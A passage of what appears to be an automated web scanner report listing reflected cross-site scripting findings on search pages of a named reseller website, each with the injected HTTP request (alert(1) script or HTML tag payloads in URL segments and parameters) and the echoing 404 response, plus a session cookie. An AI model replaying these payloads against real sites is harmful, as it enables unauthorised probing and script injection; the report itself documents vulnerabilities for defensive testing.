<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos3770a<script>alert(1)</script>c28160dba38/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1448. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 422d1<script>alert(1)</script>ab88edf375 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images422d1<script>alert(1)</script>ab88edf375/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images422d1<script>alert(1)</script>ab88edf375/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1449. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f712c<script>alert(1)</script>eeec3b33070 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/search.phpf712c<script>alert(1)</script>eeec3b33070?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.phpf712c<script>alert(1)</script>eeec3b33070?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1450. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e7e61<a>5a550d5e26f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche7e61<a>5a550d5e26f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche7e61<a>5a550d5e26f&opt=2 was not found on this server.</p>
...[SNIP]...

2.1451. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 44e42<a>d91e8da125c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...44e42<a>d91e8da125c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...44e42<a>d91e8da125c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1452. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d93e<script>alert(1)</script>a2e50239b21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&8d93e<script>alert(1)</script>a2e50239b21=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&8d93e<script>alert(1)</script>a2e50239b21=1 was not found on this server.</p>
...[SNIP]...

2.1453. http://www.resellerbase.com/detail/17/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7105f<a>6a5a866b854 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27105f<a>6a5a866b854 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27105f<a>6a5a866b854 was not found on this server.</p>
...[SNIP]...

2.1454. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32edd<script>alert(1)</script>e6197284368 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail32edd<script>alert(1)</script>e6197284368/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail32edd<script>alert(1)</script>e6197284368/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1455. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6d951<script>alert(1)</script>643ee9a6dfc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/176d951<script>alert(1)</script>643ee9a6dfc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/176d951<script>alert(1)</script>643ee9a6dfc/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1456. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8aba2<script>alert(1)</script>8f0d5cc9cd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes8aba2<script>alert(1)</script>8f0d5cc9cd9/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes8aba2<script>alert(1)</script>8f0d5cc9cd9/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1457. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 67bb8<script>alert(1)</script>815999dcc0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos67bb8<script>alert(1)</script>815999dcc0e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos67bb8<script>alert(1)</script>815999dcc0e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1458. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d2a9d<script>alert(1)</script>483d3251b6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/search.phpd2a9d<script>alert(1)</script>483d3251b6?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.phpd2a9d<script>alert(1)</script>483d3251b6?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1459. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cb226<a>40c60b14b40 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Searchcb226<a>40c60b14b40&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Searchcb226<a>40c60b14b40&opt=2 was not found on this server.</p>
...[SNIP]...

2.1460. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 36f03<a>f4875a77206 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...36f03<a>f4875a77206&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...36f03<a>f4875a77206&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1461. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fec64<script>alert(1)</script>41838068efb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&fec64<script>alert(1)</script>41838068efb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&fec64<script>alert(1)</script>41838068efb=1 was not found on this server.</p>
...[SNIP]...

2.1462. http://www.resellerbase.com/detail/17/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 66f1c<a>79d9cd6c731 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=266f1c<a>79d9cd6c731 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=266f1c<a>79d9cd6c731 was not found on this server.</p>
...[SNIP]...

2.1463. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4eea7<script>alert(1)</script>69f881e76b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4eea7<script>alert(1)</script>69f881e76b2/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4eea7<script>alert(1)</script>69f881e76b2/17/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1464. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b44ad<script>alert(1)</script>06fc2731a6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17b44ad<script>alert(1)</script>06fc2731a6a/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/17b44ad<script>alert(1)</script>06fc2731a6a/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1465. http://www.resellerbase.com/detail/17/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/17/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 922d5<script>alert(1)</script>f1bc113228b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/17/themes922d5<script>alert(1)</script>f1bc113228b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/17/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
